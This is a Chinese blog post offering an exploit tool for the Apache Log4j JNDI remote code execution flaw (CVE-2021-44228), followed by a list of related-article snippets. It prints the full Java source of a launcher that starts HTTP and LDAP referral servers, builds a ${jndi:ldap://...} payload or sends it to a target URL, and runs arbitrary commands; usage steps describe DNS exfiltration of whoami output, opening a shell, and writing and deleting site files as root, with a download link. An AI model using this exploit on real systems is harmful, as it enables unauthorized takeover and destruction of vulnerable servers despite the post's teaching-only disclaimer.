Apache Log4j任意代码执行漏洞EXP(任意命令执行 window和Linux)

最新推荐文章于 2024-10-28 00:48:15 发布
最新推荐文章于 2024-10-28 00:48:15 发布
阅读量5.7k 收藏 9
点赞数 5
分类专栏: 渗透测试 WEB安全 java 安全 文章标签: linux apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48170459/article/details/121914507
版权

声明:本程序仅教学使用,由于使用本程序攻击网站所造成的后果由读者本人承担
更新
—————————————————————————————————
依照人们需求更改test1.java代码,更改后可以运行一次程序执行多次命令

import java.util.Scanner;

public class test1 {
	public static void main(String[] argv) {
		try{   
			   System.out.print("请输入模式(1和2):");
			   Scanner input=new Scanner(System.in);
			   String flag=input.nextLine();
			   System.out.print("请输入开启服务的IP:");
	           String ip=input.nextLine();
	           String commands1="java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \"http://";
	           commands1=commands1+ip+":8100/#Exploit\"";
	           String commands = "python -m http.server 8100";
	           Process cm = Runtime.getRuntime().exec(commands);
	           Thread.sleep(3000);
	           System.out.println("启动http服务");
	           Process ct = Runtime.getRuntime().exec(commands1);
	           Thread.sleep(3000);
	           System.out.println("启动ldap服务");
	           String command;
	           while (true){
	           System.out.println("请输入执行的命令:(如果有“\\”符号请换成“\\\\”,输入0则退出)");
	           command=input.nextLine();
	           if (command.equals("0")) {
	        	   break;
	           }
	           command= command.replaceAll("\"","yinhao");
	           command="python tesst.py 2 "+"\""+command+"\"";
	           Process ct2 = Runtime.getRuntime().exec(command);
	           ct2.waitFor();
	           if (flag.equals("1")) {
	        	   String data2 = "${jndi:ldap://" + ip + ":1389" + "/Exploit}";
	        	   System.out.println("请在漏洞处插入下方的payload:");
	        	   System.out.println(data2);
	           }
	           else {
		           System.out.println("请输入漏洞URL:");
		           input=new Scanner(System.in);
		           String url=input.nextLine();
		           System.out.println("请输入漏洞触发参数(没有则输入0):");
		           input=new Scanner(System.in);
		           String par=input.nextLine();
		           command="python tesst.py 1 "+"\""+ip+"\" "+"\""+url+"\" "+"\""+par+"\"";
		           Process ct3 = Runtime.getRuntime().exec(command);
		           ct3.waitFor();
	           }
	           }
	           System.out.println("输入任意字符停止程序:");
	           input=new Scanner(System.in);
	           command=input.nextLine();
	           ct.destroy();
	           System.out.println("http服务关闭:");
	           cm.destroy();
	           System.out.println("ldap服务关闭:");
	      } catch(Exception e){
	           e.printStackTrace();
	  }
}
}

在这里插入图片描述
在这里插入图片描述
原文
—————————————————————————————————

百度云链接:https://pan.baidu.com/s/1cB2ffoWiVti3Ve_ZM73-cA
提取码:nexu

仅测试Linux版本,Windows未测试,服务占用端口为8100和1389,个人推荐使用模式1(模式2仅支持POST请求)

测试环境:
java:版本
在这里插入图片描述

python版本
在这里插入图片描述

需要的python包
在这里插入图片描述

测试网站环境:Linux

使用方法:
1,运行 javac test1.java编译程序
在这里插入图片描述
2,java test1 运行程序
本程序有两种模式,这里先演示模式2
在这里插入图片描述

首先选择模式,然后输入启动服务的IP,等待服务启动,然后输入要执行的命令,这里运行 ping `whoami`.1ffa9h.dnslog.cn ,然后输入漏洞URL和漏洞参数,然后等待执行完成
在这里插入图片描述
执行完成,当前用户为root用户
在这里插入图片描述弹个shell(这里有点奇怪,显示连接上了但没有交互窗口给我)
在这里插入图片描述在网站下面添加a.txt文件
在这里插入图片描述
删除网站文件
在这里插入图片描述
3,演示模式1
模式1跟模式2差不多,不过会生成payload,把payload粘贴在怀疑有漏洞的参数,直接盲打就完了。
在这里插入图片描述
我这里网站的漏洞参数是c
在这里插入图片描述执行结果
在这里插入图片描述

注:等攻击完成后再关闭程序

(CVE-2021-44228)Apache log4j 远程命令执行
weixin_45253622的博客
12-19 4177
漏洞简介 Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。 Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用
Linux NetworkManager网络服务详解
悦分享
08-10 7222
extended internet daemon,xinetd是新一代的网络守护进程服务程序,又叫超级Internet服务器,常用来管理多种轻量级Internet服务。xinetd提供类似于inetd+tcp_wrapper的功能,但是更加强大安全
Log4j2远程命令执行(CVE-2021-44228)
qq_40646572的博客
05-12 1500
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ,进行rmi注入。启动服务后,进入主页面,点击页面中的?链接,跳转到,目标地址。及时升级log4j组件。
Log4j 任意代码执行漏洞,组件升级
Xzh_java的博客
11-30 363
任意代码执行2021 年 12 月 9 日,该项目被曝存在 严重安全漏洞 ,攻击者只需要向目标机传入一段特殊代码,就能触发漏洞,自由地在远程执行任意代码来控制目标机器!Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
Java代码审计——apache log4j 远程命令执行(CVE-2021-44228)
王嘟嘟的博客
12-13 2067
0x00 前言 反序列化总纲 本来是快乐游戏时间的,但是突然就出来这个洞了= =,当然这个突然用的比较夸张了,修复时间应该是在五天前了。 本着学习的态度来进行一下简单的分析。 0x01 环境 首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo
log4j漏洞详解
weixin_61638307的博客
03-21 4584
JNDI(Java Naming and Directory Interface,Java命名目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
入门学习Linux常用必会60个命令实例详解doc/txt
06-09
本文以Mandrake Linux 9.1(Kenrel 2.4.21)为例,介绍Linux下的安装登录命令。 immortality按:请用ctrl+f在本页中查找某一部分的内容或某一命令的用法。 ----------------------------------------------------...
WindowApache 源代码编译
FlyingRoc0209的博客
07-26 1518
1、下载ApacheDeps,http://www.apache.org/dist/httpd/,以2.4.23为例; 2、用Cmake构建APR的VS代码,具体设置如下,编译安装; 3、用Cmake构建APR-util的VS代码,具体设置如下,编译安装; 4、用Cmake构建PCRE的VS代码,具体设置如下,编译安装; 5、用Cmake构建Apache的VS代码
window 服务器443端口占用,关于Windows下的Apache多域名同IP、同443端口使用Https相关事项说明...
weixin_29119159的博客
07-30 757
最近因为微信小程序的开发需要用到接口必须是https方式调用,所以就将自己的服务器从http升级到了https,但在升级调整过程中遇到了一些问题,经过反复测试最终还是找到的原因。我使用的是阿云服务器,服务器上若干个网站都是采用二级域名的形式进行访问,比如我的域名mdaima.com,还有一些子站是a.mdaima.com、b.mdaima.com等等。前期一直是http方式访问,没有任何问题,调整...
linux shell 脚本详解 | 服务器排障常用命令 | 创建窗口部件
最新发布
u013669912的博客
10-28 1250
……
log4j简介(jakarta-log4j-1.2.8)
05-28
根据log4j(jakarta-log4j-1.2.8)的开发包自带文档的manual翻译
Log4j-2命令执行复现及分析
weixin_46137328的博客
12-12 1080
0x00 漏洞描述Apache Log4j2是一个基于Java的日志记录框架。正常情况下,开发者可能会将错误信息写入日志中,可以利用此特点构造特殊的数据请求包,最终触发远程代码执行RCE漏...
Log4j2远程命令执行(CVE-2021-44228)漏洞复现
m0_69896901的博客
10-11 253
记录复现Log4j2的过程
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 428
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
log4j历史漏洞复现
weixin_53747497的博客
04-02 1401
Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。该工具重写了 log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组 建等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目 标服务器上执行任意代码。
Log4j 使用指南
EnskDeCode
02-22 302
Log4jApache 的一个开源项目 , 通过使用 Log4j , 我们可以控制日志信息输送的目的地是控制台 , 文件 , GUI 组件 , 甚至是套接口服务器 , NT 的事件记录器 , UNIX Syslog 守护进程等 ; 我们也可以控制每一条日志的输出格式 ; 通过定义每一条日志信息的级别 , 我们能够更加细致地控制日志的生成过程 ; 最令人感兴趣的就是 , 这些可以通过一个配置文...
【网络安全Log4j 远程代码执行漏洞解析
程序员若风的博客
12-25 1295
log4j支持JNDI协议。Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。
Log4j2漏洞复现(CVE-2021-44228)
qq_40860153的博客
05-11 716
3、解析到ldap,就会去192.168.96.1:1099的ldap服务找名为shell的资源,找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会将资源下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。观察dns网站解析日志结果,刷新,发现解析成功,说明漏洞存在。
Apache Log4j使用详细介绍
Habo的专栏
09-23 4399
Apache Log4j使用详细介绍:   一、简介:1, Log4J 是Apache 的Logging项目。可去官网查看。           2,下载地址:http://logging.apache.org/log4j/1.2/download.html           3,Apache Log4j是当前在J2EEJ2SE开发中用得最多的日志框架(几乎所有项目都用它),因为它具有
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值